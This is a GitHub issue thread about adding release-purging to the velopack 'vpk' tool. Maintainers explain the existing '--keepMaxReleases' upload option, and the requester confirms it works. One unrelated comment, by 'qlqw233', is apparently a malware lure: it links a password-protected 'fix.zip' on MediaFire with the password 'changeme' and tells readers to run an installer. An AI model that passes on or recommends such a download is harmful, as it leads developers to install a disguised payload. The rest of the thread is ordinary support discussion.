### ISSUE TITLE
add purge support for vpk

### ISSUE THREAD

**Issue by farangkao** [velopack/velopack#205]
**Is your feature request related to a problem? Please describe.**
During testing velopack, i of course created alot of versions, which everyone has a -full and -delta .nupkg
This made me think
a) do i really need all the -full ? since my clients usually update fast, and even if they fail to update in time, they still can install to the latest feature, so -full is actually only needed for the last version ,maybe 2nd to last to calculate the -delta?
b) after some delta updates, like 5 or 10, it's not really necessairy to keep all older, in my estimate the patching (even if the files are smaller), will take longer then downloading the latest version

**Describe the solution you'd like**
a command like `vpk pack purge --channel x --version-to-keep 1.1.0`
which would
a) change the existing json files
b) remove uneccessary files

**Describe alternatives you've considered**
i will try to implement similar logic through my python support scripts, but i think this would be also helpful to other users.

**Additional context**
-None-

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caesay** [comment]
The pattern for releasing velopack software can start with an empty local directory and consists of `vpk download -> vpk pack -> vpk upload`. This way you do not need to store any local releases and delta releases can be created in CI etc where previous releases are not available. 

The `vpk upload` commands have a `--keepMaxReleases <COUNT>` argument which will allow you to prune old releases when publishing your new releases.

See also:
- https://docs.velopack.io/distributing/deploy-cli
- https://docs.velopack.io/distributing/overview

**Comment by caesay** [comment]
To answer your other question `b` (which I missed the first time). Velopack already makes a calculation on whether it should try with delta's or with full releases. Delta's are pretty small and quick these days (in Squirrel days they were a lot slower) but your clients may still end up downloading full releases if Velopack thinks it will be faster.

**Comment by farangkao** [comment]
Thanks, totally missed that you can use `vpk upload local --keepMaxReleases`
will try this right now!

**Comment by farangkao** [comment]
Works like a charm

```powershell
Retention policy about to delete 57 release(s)...
```
